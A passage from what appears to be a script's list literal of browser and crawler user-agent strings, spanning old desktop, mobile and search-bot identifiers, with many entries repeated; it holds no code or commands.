iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 